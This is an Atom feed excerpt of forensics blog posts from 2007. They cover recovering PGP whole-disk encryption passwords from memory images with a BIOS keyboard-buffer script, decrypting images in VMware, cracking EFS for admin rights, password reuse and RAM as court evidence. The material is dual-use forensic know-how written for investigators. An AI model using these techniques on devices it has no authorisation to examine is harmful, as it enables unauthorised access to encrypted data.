rather unpleasant), but gaining Admin/System rights might be useful for acquisition if used in conjunction with Bart PE and a write blocker.  I'll defer to those that have done more work here to decide.&lt;br /&gt;&lt;br /&gt;I'd guess that if you followed the steps for cracking PGP that I outlined previously, you could use this to crack the EFS files without cracking the SAM.  I have no idea if this would be faster than cracking the SAM and using traditional forensic tools would be, but it's always nice to have more than one tool in your toolbox.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-1466359576072745363?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/1466359576072745363/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=1466359576072745363' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/1466359576072745363'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/1466359576072745363'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/06/quickly-cracking-efs-on-vista-and.html' title='Quickly Cracking EFS on Vista (and getting local admin rights too)'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-6842598106819296599</id><published>2007-06-16T12:20:00.000Z</published><updated>2008-12-11T18:56:59.968Z</updated><category scheme='http://www.blogger.com/atom/ns#' term='Legal Decisions'/><category scheme='http://www.blogger.com/atom/ns#' term='RAM'/><title type='text'>RAM and U. S. Courts</title><content type='html'>I subscribe to quite of few mailing lists.  In fact, I'm one of those people who cannot keep up with the volume of email that I receive because I get so much of it.  &lt;br /&gt;&lt;br /&gt;My usual strategy is to let gmail handle what I'll read by adding a star to those people's emails that I have a personal relationship with, friends, smart people, etcetera; then all I have to do is skim subject lines of unstarred posts before selecting and deleting those (BTW, I star all comments that come in here under the smart people category ;-)).  The following almost got cut, but I'm glad it didn't.&lt;br /&gt;&lt;br /&gt;An &lt;a href="http://news.com.com/TorrentSpy+ruling+a+weapon+of+mass+discovery/2100-1030_3-6190900.html"&gt;article on Cnet&lt;/a&gt;, reports that a Federal Magistrate in the Central District of California has ordered that Torrentspy turn over masked IP addresses in a ongoing civil case that the RIAA brought against it.  Why is this interesting?  Because the Magistrate ruled that even though the data in RAM is in "electronic storage."&lt;br /&gt;&lt;br /&gt;I'm not a lawyer, but let me see if I can put this issue in a nutshell:  In criminal and civil cases, there's a pretty well accepted rule; you cannot force someone to create a document that they do not already have, and then force them to produce that document.  So, I couldn't send a subpoena to example.com and ask them to produce something worded like this:&lt;br /&gt;&lt;br /&gt;"A document containing Customer John Smith's Social security number, mother's maiden name, his last three log ins to the system and his credit card information." &lt;br /&gt;&lt;br /&gt;Unless of course, example.com &lt;span style="font-style:italic;"&gt;had&lt;/span&gt; a document like that already.    From the article, "a federal judge in Los Angeles found that a computer server's RAM, or random-access memory, is a tangible document that can be stored and must be turned over in a lawsuit."&lt;br /&gt;&lt;br /&gt;What I found most interesting was the discussion of the issue.  The Judge's ruling explains some of the history of RAM in Federal court cases, and since there are not a lot of them, I found the analysis enlightening.&lt;br /&gt;&lt;br /&gt;You can find the original &lt;a href="http://i.i.com.com/cnwk.1d/pdf/ne/2007/Torrentspy.pdf"&gt;here&lt;/a&gt;, but I have included the discussion below.  The case is Columbia Pictures et al. v. Justin Bunneli, et al. CV 06-1093 in the Central District of California&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_npXrWSJ111w/RnPkvbxPiAI/AAAAAAAAAA0/l9xNTnt8h0g/s1600-h/1.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_npXrWSJ111w/RnPkvbxPiAI/AAAAAAAAAA0/l9xNTnt8h0g/s400/1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5076652708535961602" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Discusson of Websites in general.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_npXrWSJ111w/RnPl9bxPiBI/AAAAAAAAAA8/gxn2RLB3MZQ/s1600-h/2.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_npXrWSJ111w/RnPl9bxPiBI/AAAAAAAAAA8/gxn2RLB3MZQ/s400/2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5076654048565757970" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Operation of defendants' website.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_npXrWSJ111w/RnPmZ7xPiCI/AAAAAAAAABE/bGwOpmHCFzo/s1600-h/3.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_npXrWSJ111w/RnPmZ7xPiCI/AAAAAAAAABE/bGwOpmHCFzo/s400/3.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5076654538192029730" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Discussion of server log data.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_npXrWSJ111w/RnPmw7xPiDI/AAAAAAAAABM/VgEGCaGae_A/s1600-h/4.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_npXrWSJ111w/RnPmw7xPiDI/AAAAAAAAABM/VgEGCaGae_A/s400/4.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5076654933329020978" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;RAM is Electronically Stored Information according to the Federal Rules of Evidence:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_npXrWSJ111w/RnPnZ7xPiEI/AAAAAAAAABU/-HSlWMLGA-8/s1600-h/5.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_npXrWSJ111w/RnPnZ7xPiEI/AAAAAAAAABU/-HSlWMLGA-8/s400/5.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5076655637703657538" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;MAI Systems Corporation v. Peak Computer, Inc., 991 F.2d. 511, 518-19(9th Cir. 1993) citation:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_npXrWSJ111w/RnPoSbxPiFI/AAAAAAAAABc/oNlJ3ZzELGQ/s1600-h/6.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_npXrWSJ111w/RnPoSbxPiFI/AAAAAAAAABc/oNlJ3ZzELGQ/s400/6.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5076656608366266450" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Perfect 10, Inc. v. Amazon.com, Inc., 2007 WL 1428632 (9th Cir. May 16, 2007:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_npXrWSJ111w/RnPpErxPiGI/AAAAAAAAABk/0johaD3CbdQ/s1600-h/7.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_npXrWSJ111w/RnPpErxPiGI/AAAAAAAAABk/0johaD3CbdQ/s400/7.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5076657471654692962" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Three more cases discussing RAM:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_npXrWSJ111w/RnPpmLxPiHI/AAAAAAAAABs/VRJAprmtGns/s1600-h/8.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_npXrWSJ111w/RnPpmLxPiHI/AAAAAAAAABs/VRJAprmtGns/s400/8.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5076658047180310642" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;If you read the decision, you see that there are several cases where  courts have ruled that data in RAM is both tangible and recoverable.    What does all this have to do with forensics?  Well, what if you had a case where a kid had been kidnapped after chatting with the bad guy in an Instant Messaging session and there was not any logging of chats?  &lt;br /&gt;&lt;br /&gt;Assume that you could collect the contents of RAM and find the smoking gun there (say, the offender's IM name) and this led you to the bad guy, and you later discovered that he killed the kid.  If you had those kinds of data from RAM, that could be incredibly important to your case.  If your evidence came up for a supression hearing, you could point your prosecutor to some other cases where other courts had examined the contents of RAM as evidence, and that might be useful to help put our bad guy where he belongs by helping get the chats you recovered allowed into evidence at trial.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-6842598106819296599?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/6842598106819296599/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=6842598106819296599' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/6842598106819296599'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/6842598106819296599'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/06/ram-and-u-s-courts.html' title='RAM and U. S. Courts'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_npXrWSJ111w/RnPkvbxPiAI/AAAAAAAAAA0/l9xNTnt8h0g/s72-c/1.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-4364352055330433051</id><published>2007-06-11T02:24:00.001Z</published><updated>2008-12-11T18:57:00.355Z</updated><title type='text'>"Defeating" Whole Disk Encryption, Part 3</title><content type='html'>In &lt;a href="http://breach-inv.blogspot.com/2007/05/defeating-whole-disk-encryption-part-1.html"&gt;Part One&lt;/a&gt;, we reviewed obtaining the last 16 characters of the PGP password from a computer that was live.  In &lt;a href="http://breach-inv.blogspot.com/2007/05/defeating-whole-disk-encryption-part-2.html"&gt;Part Two&lt;/a&gt;, we reviewed how to set up your VMware box so you can boot the image.  In this post we will review the options for imaging the computer, be forewarned, neither is a perfect solution.&lt;br /&gt;&lt;br /&gt;Tools you may need:&lt;br /&gt;&lt;br /&gt;1.  The PGP recovery .iso.  You will need the correct .iso for the version of PGP installed on the computer.  You can find the files &lt;a href="https://pgp.custhelp.com/cgi-bin/pgp.cfg/php/enduser/std_adp.php?p_faqid=471&amp;p_created=1142375634&amp;p_sid=DXy5SPDi&amp;p_accessibility=0&amp;p_redirect=&amp;p_lva=&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD00MTAmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&amp;p_li=&amp;p_topview=1"&gt;linked from this page&lt;/a&gt;. &lt;br /&gt;&lt;br /&gt;2.  You may also need the original media used to install the OS on the computer, or a version that is very close.  In other words, if the computer is running XP Home, you will need an XP Home CD.  It's usually better to have the one that was used to install the OS on your suspect's box, but I've had success without having it.&lt;br /&gt;&lt;br /&gt;Now it's time for the choice we discussed in post two; do you need unallocated space?  If you don't, you can jump down to the decryption option, but really, now would be a good time to back up your VMware files - you'll need them so you can go back to a good image, and to document your work.  Let's call this back-up 1.&lt;br /&gt;&lt;br /&gt;"LIVE" ACQUISITION OPTION:&lt;br /&gt;&lt;br /&gt;Boot your drive, enter the PGP password and get through the windows boot sequence.  If you have boot failures, use the OS CD to get the necessary files and continue to reboot until you can boot the computer.  Once you have the drive booted, you can use a variety of tools to acquire the drive back to the share on your computer.  &lt;br /&gt;&lt;br /&gt;You may need to add another drive share if you do not have sufficient drive space - follow the steps you followed to add a shared folder if you do.&lt;br /&gt;&lt;br /&gt;The advantage of this method is that you will be able to access unallocated space and file slack on the drive.  The disadvantages include having to make multiple changes to the drive which includes adding files.  The good news is that another examiner will have to follow the same steps (when using your computer).  The files that you add won't be evidentiary in nature, but you are changing the evidence; however, there is no other option of which I'm aware so I think it's defensible. &lt;br /&gt;&lt;br /&gt;DECRYPTION OPTION:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Edit your VMware session  and change your CD ROM device from the physical device to the .iso image that you downloaded from PGP.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_npXrWSJ111w/Rmy4frxPh_I/AAAAAAAAAAs/BfroeQqGtE4/s1600-h/vmware.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_npXrWSJ111w/Rmy4frxPh_I/AAAAAAAAAAs/BfroeQqGtE4/s400/vmware.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5074633734604425202" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Save your settings and boot the VM ensuring that you are booting to the CD first.&lt;br /&gt;&lt;br /&gt;The CD will ask for the PGP password and run through a decryption dialogue.  I'm writing this from memory, so I won't try and outline the steps, but it's self explanatory.  After you begin decryption, take the day off because you are going to have long wait.  I've found that it takes 16-24 hours.  &lt;br /&gt;&lt;br /&gt;Once the drive is decrypted, take a snapshot with VMware and then save those files as backup 2.  &lt;br /&gt;&lt;br /&gt;Now you can boot the computer, or pull the decrypted VM into Encase for analysis.  You won't see anything in unallocated space.  Apparently, VMware only decrypts allocated files, but you should have all the active files available for analysis.  Again, not perfect, but better than nothing right?&lt;br /&gt;&lt;br /&gt;A couple of other thoughts:&lt;br /&gt;&lt;br /&gt;I suspect that putting a new drive in the suspect's computer and installing a new OS with VMware etc. on your drive, then booting the suspect's drive as a VM would get past the compatability problems - if anyone has time to test this, I'd be really interested in knowing your results.&lt;br /&gt;&lt;br /&gt;If you don't have the PGP password, &lt;a href="http://www.accessdata.com"&gt;AccessData&lt;/a&gt;'s Password Recovery Toolkit and Distributed Network Attack can be used to brute force the partition.  I haven't tried it, but they claim that this is possible.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-4364352055330433051?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/4364352055330433051/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=4364352055330433051' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/4364352055330433051'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/4364352055330433051'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/06/defeating-whole-d.html' title='&quot;Defeating&quot; Whole Disk Encryption, Part 3'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_npXrWSJ111w/Rmy4frxPh_I/AAAAAAAAAAs/BfroeQqGtE4/s72-c/vmware.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-5497471555973483256</id><published>2007-06-10T22:13:00.000Z</published><updated>2007-06-10T22:24:36.479Z</updated><category scheme='http://www.blogger.com/atom/ns#' term='Phishing'/><category scheme='http://www.blogger.com/atom/ns#' term='Password Reuse'/><category scheme='http://www.blogger.com/atom/ns#' term='InfoSec'/><title type='text'>What's in your (electronic) wallet?</title><content type='html'>I was looking at RSnake's Mr. T the other day.  For those who don't know, Rsnake developed a pretty simple proof of concept showing the information that your &lt;a href="http://seattle.toorcon.org/talks/rsnake.ppt"&gt;browser will disclose&lt;/a&gt; to someone with a website.  &lt;a href="http://ha.ckers.org/mr-t/"&gt;You can see a demo here&lt;/a&gt;.  Notice that your browser gives up your web-based email address?&lt;br /&gt;&lt;br /&gt;This got me thinking; why waste your time phishing for passwords?  It's a given that everyone reuses passwords.  A bit of googling turned up turned up a &lt;a href="http://cups.cs.cmu.edu/soups/2006/slides/gaw.ppt"&gt;small academic study&lt;/a&gt; showing that the average was just over 3 per person.&lt;br /&gt;&lt;br /&gt;So what does all this mean?  Where does almost every website send your password?  Right to your email account in most cases.  So if I can read your email, I can own any account I want that is associated with that email.  I can get a password reminder, or a password reset sent there and if I'm smart, the user would never know until it is too late.&lt;br /&gt;&lt;br /&gt;So why phish for passwords?  I could create a site that grabbed all the user's data (and probably a bit more) than Mr. T grabs, and get the user to give me a password.  I could give the user something that they want (think Free Porn).  Since I have a one in three chance that the password, (or even one in ten for that matter) I could go take over a lot of users lives.  Bank accounts, your resume, your mother's maiden name, passwords to your favorite sites?  I read user's email all the time - that's all there for the taking.&lt;br /&gt;&lt;br /&gt;Now the second question is; What to do about it?  This is a acknowledged problem, but short of carrying around an encrypted USB drive (user's don't want that), or using some form of &lt;a href="http://en.wikipedia.org/wiki/Strong_authentication"&gt;two-factor authentication&lt;/a&gt;, I don't see any answers on the horizon.&lt;br /&gt;&lt;br /&gt;The scary thing is, if I'm thinking about this, someone's already doing it.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-5497471555973483256?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/5497471555973483256/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=5497471555973483256' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/5497471555973483256'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/5497471555973483256'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/06/whats-in-your-electronic-wallet.html' title='What&apos;s in your (electronic) wallet?'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-422724926543059530</id><published>2007-06-06T00:51:00.000Z</published><updated>2007-06-06T01:01:16.509Z</updated><title type='text'>New updates are coming, or I don't like group papers</title><content type='html'>I am in the process of finishing up my MS this month, so things are on hold here until I finish up finals, term papers and a short teaching gig this week.&lt;br /&gt;&lt;br /&gt;The worst part of grad school is working on group papers.  It is hard enough to do your own work, but when you have to share the load with 3-5 other people, it makes things even more complicated, and if you are the guy who has to edit and produce the final product, your life just sucks.&lt;br /&gt;&lt;br /&gt;Now where did I leave my APA guide. . .?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-422724926543059530?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/422724926543059530/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=422724926543059530' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/422724926543059530'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/422724926543059530'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/06/new-updates-are-coming-or-i-dont-like.html' title='New updates are coming, or I don&apos;t like group papers'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-7022494571133282317</id><published>2007-05-24T00:24:00.000Z</published><updated>2007-05-24T02:00:16.516Z</updated><title type='text'>"Defeating" Whole Disk Encryption - Part 2 "Ok, I've got the password, now what"</title><content type='html'>In my last post I discussed some techniques for obtaining a PGP encrypted password from a DD image of the physical memory.  Let's quickly take a look at how to tackle a dead box before we start to tie all this together.&lt;br /&gt;&lt;br /&gt;Dead box:&lt;br /&gt;&lt;br /&gt;I'm going to quickly go over this, as I haven't tested what I'm going to write about here.&lt;br /&gt;&lt;br /&gt;Accessdata's Password Recovery Toolkit and Distributed Network Attack can be used to bruteforce a dead box.  I have not done this, but I'm a big fan of all of Accessdata's tools.&lt;br /&gt;&lt;br /&gt;So now we have broken the password/passphrase what are your choices?&lt;br /&gt;&lt;br /&gt;Let us assume that you have the password, but you couldn't make a live image of the box.  How to get in?  Before I start, I'm going to put a big shout out to Dave Shaver over at the US Army's Computer Crime Investigative Unit - a lot of what follows is based on his research and work. . .  There are a few other ways that might work here, but this is the one that I've tested.&lt;br /&gt;&lt;br /&gt;The Attack:&lt;br /&gt;&lt;br /&gt;You are going to need Vmware workstation and Encase.  You will also need to download the PGP decryption .iso for the PGP encryption version that your box is running.  You can download those &lt;a href="https://pgp.custhelp.com/cgi-bin/pgp.cfg/php/enduser/std_adp.php?p_faqid=471"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Step 1:&lt;br /&gt;&lt;br /&gt;In VMware workstation create a VM that you can install Encase (XP, 2000 etc). &lt;br /&gt;&lt;br /&gt;Step 2:  &lt;br /&gt;&lt;br /&gt;Boot your drive, install vmware tools - shutdown the VM.&lt;br /&gt;&lt;br /&gt;Step 3.&lt;br /&gt;&lt;br /&gt;Edit your shared folders &lt;edit virtual machine settings&gt;, &lt;options&gt;,  &lt;shared folders&gt; and add the folder/drive to add the encrypted image  files to something that the VM can access.  You might also want to add the folder where you have the Encase installer executable and the Hasp Driver installation file (or you could download those from guidancesoftware.com - your call, but they need to be on the VM or in a folder the VM can access).&lt;br /&gt;&lt;br /&gt;Step 4:&lt;br /&gt;&lt;br /&gt;Add a second hard drive to your virtual machine.  The second hard drive should be slightly larger than the original drive on the encrypted machine.  So if the original drive was 188.6 GB, you will want to make your machine 188.7 in VMware. (Note:  If you have problems, keep incrementally increasing the size of the drive)&lt;br /&gt;&lt;br /&gt;Step 5:&lt;br /&gt;&lt;br /&gt;Reboot the VM, install the hasp driver and Encase.  With VMware in the foreground, plug in your Encase dongle and start Encase.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Step 6:&lt;br /&gt;&lt;br /&gt;Encase should be running in forensic mode.  Add the image into Encase.  Go through the restoration procedures as if you were restoring the image to a drive, but here, you are going to restore the image to the second drive that we created in step 4.  There's a how-to in the Encase manual if you are not sure of the procedures.&lt;br /&gt;&lt;br /&gt;Step 7:&lt;br /&gt;&lt;br /&gt;Power off your VM, take a copy of the file related to the step 4 drive and copy them to the drive where you have the original image files - copies are your friend here.  It's good forensic practice and even if you don't think you need to do this, you'll see why you want to as you read on.&lt;br /&gt;&lt;br /&gt;Step 8:&lt;br /&gt;&lt;br /&gt;Edit the settings on your virtual drive.  Remove the drive that you used to boot (the one we created in step 1).  The only drive that should remain active for your VM is the drive from Step 4 - the restored image of the PGP encrypted computer.&lt;br /&gt;&lt;br /&gt;Now it is decision time.  What are you looking for?  Will you be satisfied with only the files that are not deleted, or do you want to make a few changes to the drive and have the chance to get into unallocated space?  The good news is that you can have it both ways.&lt;br /&gt;&lt;br /&gt;We will tackle that in the next post.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-7022494571133282317?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/7022494571133282317/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=7022494571133282317' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/7022494571133282317'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/7022494571133282317'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/05/defeating-whole-disk-encryption-part-2.html' title='&quot;Defeating&quot; Whole Disk Encryption - Part 2 &quot;Ok, I&apos;ve got the password, now what&quot;'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-1903388692540715613</id><published>2007-05-22T23:23:00.000Z</published><updated>2007-05-23T00:57:41.375Z</updated><title type='text'>"Defeating" Whole Disk Encryption - Part 1</title><content type='html'>An issue that we are going to continue to encounter is computers with whole disk encryption (WDE).  I'm going to post a couple of techniques that have worked for me, and hopefully they'll be of use to someone else out there.  In this post, we will look at PGP's WDE, although the techniques outlined here should be easily applied to other encryption schemes.&lt;br /&gt;&lt;br /&gt;The background:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://download.pgp.com/pdfs/datasheets/PGP_WDE_DS.pdf"&gt;PGP WDE&lt;/a&gt; uses 256 bit, symmetric &lt;a href="http://en.wikipedia.org/wiki/Advanced_Encryption_Standard"&gt; AES encryption&lt;/a&gt;.  For those of you that don't know what this means, suffice it to say that the algorithm is sufficiently strong to prevent the average person/company/government agency from breaking it. &lt;br /&gt;&lt;br /&gt;In many cases we do not have the cooperation of the system owner, so  how do we handle this?&lt;br /&gt;&lt;br /&gt;Scenario 1 - the computer is running:&lt;br /&gt;&lt;br /&gt;If there ever was a reason to argue the Live vs. Dead acquisition arguement, disk encryption has to be one in favor of the live side.  My personal preference is to acquire the volatile memory (at a minimum) before shutting down the system.  Let's assume that you cannot image the whole system live - grabbing the memory with a tool like &lt;a href="http://users.erols.com/gmgarner/forensics/"&gt;George Garner's forensic DD&lt;/a&gt;.  No, it won't work on Vista or Server 2003 with a service pack installed, but the price is right.  If you have the money though, George has &lt;a href="http://users.erols.com/gmgarner/KnTTools/"&gt;solved that problem&lt;/a&gt; too.&lt;br /&gt;&lt;br /&gt;So now you have a dd image of the physical memory, and a dead computer.  You image the same computer and you start looking at the drive and realize that you are seeing nothing but garbage - there's no usable data on the drive.&lt;br /&gt;&lt;br /&gt;Fortunately, Adam Bolieau help solved that problem.  Adam and Tmasky did some &lt;a href="http://www.storm.net.nz/projects/16"&gt;really interesting work&lt;/a&gt; on acquiring memory via firewire, but he also wrote some &lt;a href="http://www.storm.net.nz/static/files/bioskbsnarf"&gt;really useful code&lt;/a&gt; that will read BIOS passwords from memory.  Fortunately for us, PGP stores its passwords in the same memory location.  So all we have to do is point bioskbsnarf.py[1] at the DD image that we made of the memory and viola - there's the password.&lt;br /&gt;or at least the last 16 bytes in the keyboard interrupt buffer in the BIOS Data Area before you enter protected mode - so you may not see the "whole" password, but would you rather try to brute force but wouldn't it be easier to brute force the password "I am Computer Geek" if you could see: " a Computer Geek"?  I think so. . .&lt;br /&gt;&lt;br /&gt;Coming up:&lt;br /&gt;&lt;br /&gt;Ok, I've got the password.  Now what?&lt;br /&gt;&lt;br /&gt;[1].  biobksnarf needs a Python interpreter to run.  Python can be downloaded from &lt;a href="http://www.python.org/download/"&gt;Python.org&lt;/a&gt;, though I have not used the windows binaries with biokbsnarf.  If you run into problems, try &lt;a href="http://www.cygwin.com/"&gt;cygwin's&lt;/a&gt; python interpreter on a windows system.&lt;br /&gt;&lt;br /&gt;From the command line: "python biobksnarf.py &lt;DdImageFilename&gt;" should do the trick.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' 